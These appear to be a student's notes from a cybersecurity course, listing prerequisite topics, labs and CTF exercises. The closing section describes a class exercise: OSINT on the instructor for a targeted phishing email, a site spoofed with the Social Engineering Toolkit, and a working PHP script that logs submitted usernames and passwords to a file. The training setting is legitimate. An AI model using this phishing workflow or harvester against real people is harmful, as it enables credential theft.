BWSI CyberOps
Pre Req Course:
Digital Systems
Boolean Logic
Logic Gates
Different types of Latches + Flip Flops 
How memory is stored
Memory and Registers
KMaps
Bits, Signed Numbers
Endianness (Direction of least significant bit)
System Admin
Computing Hardware
CPU, Chipsets, HDD v SSD
RAM, ROM, Cache
Navigating Terminal (Linux)
Permissions, Basic Commands
Data Architecture 
Data Centers
Google architecture
Safety with Servers (Heat + Making sure don’t lose power)
Keeping High Availability
RAID 
Fiber, Copper
C and Assembly Basics
How allocation of memory works between the two 
Pointers 
Registers
Networking Admin
Typers of Networks
Local, Global
Topology of Networks
Network Hardware
Bridge, Repeater, Hub, Switch, Router, etc…
IP Addresses, Packets, WEB Protocols
Engineering of Internet and ICANN
Different Layers of networking 
Dynamic vs Static Routing
Cryptography and Stenography
XOR Encryption
Ciphers
Hashing 
Digital Signatures
CyberChef and different formats
1 Month Course (On Ubuntu, Kali, and Metasploitable)
Linux Fundamentals and OTW Bandit
SSH Logins, cat, |, etc…
Conversions between different files through terminal
OpenStego
Encoded images with messages using online tools
Coded our own storing messages through bytes of pixels by changing the LSB
PicoCTF
Encryption + Hashing
TryHackMe
Zero Knowledge Proofs
Exchanging keys 
Networking
More networking and practice through using tools
Wireshark
PWN College Labs
XSS/CSRF/SQLi/CALDERA/ATT&CK Web Attacks 
How these were exploited in 2000s before HTTPS (HTTP)
Using BurpSuite
Using Ghidra to reverse engineer code
Few labs to find secret pass through C broken down to assembly code
Roles of Security and Defensive Engineer and Clickjacking
JohnTheRipper Password and Hash Cracker 
How it uses stolen hashes to guess others
How it uses lists of common passwords to crack passwords
AI and ML Adversarial Attacks
How they work
Spoofing negative comments into positive ones within ML models
Docker Permissions and how they can be exploited if not set up right
MIT Caldera 
How scripts can be setup if other machine compromised
IOT and unsafe messages through MQTT
Wireshark CTF
I had personal presentation on CHE18 thingy for attacking firmware
Debate of privacy concerns between adblockers (pro and neg)
Reading Quantum research paper explaining basics of quantum gates 
Used IBM Quantum Computing online to create some quantum gates
OSINT on Instructor Lab
CAPSTONE CTF!!!!!
PCAP CTF (Wireshark)
Included puzzles with cyberchef decoding messages, using different encryption breaking methods, decoding an image using coding tools, Ghidra to reverse engineer some specific files
Satellite Server (5 minutes to log on every 15 minutes)
Parse through files for flags
Crack hashes
Navigated through users accounts
Unpack weird zip files
Third one took place on a few websites
Measure how fast a server responded to parsing a password to slowly crack it
Parse domain using burp suite and parsing html for hidden links / flags

Overall:
Preq = Theory
Actual Course: Learning how to apply theory to cybersec -> Applying it throughout labs and CTFS
Learned a lot about architecture of computers and networks and got to discover a lotta new fields. Contextualize how some things like docker, packages, server 
Flags (Orange Team (4 People)) We split up details. 
OSINT
Grab the instructor's email and find out personal details to email a targeted email for him to click on.  
Scrape a Website with HTML and “trick” (Have a good enough mock website) to grab the instructors password and log it on a server (Apache Hosting)
Social Engineering Toolkit -> used to spoof a version of instructors favorite band website 
PHP Script for logging user + pass
<?php file_put_contents("creds.txt", "User: " . $_POST['username'] . " | Pass: " . $_POST['password'] . "\n", FILE_APPEND);header('Location: https://www.youtube.com/watch?v=dQw4w9WgXcQ&ab_channel=RickAstley'); // Redirect after login exit();?>


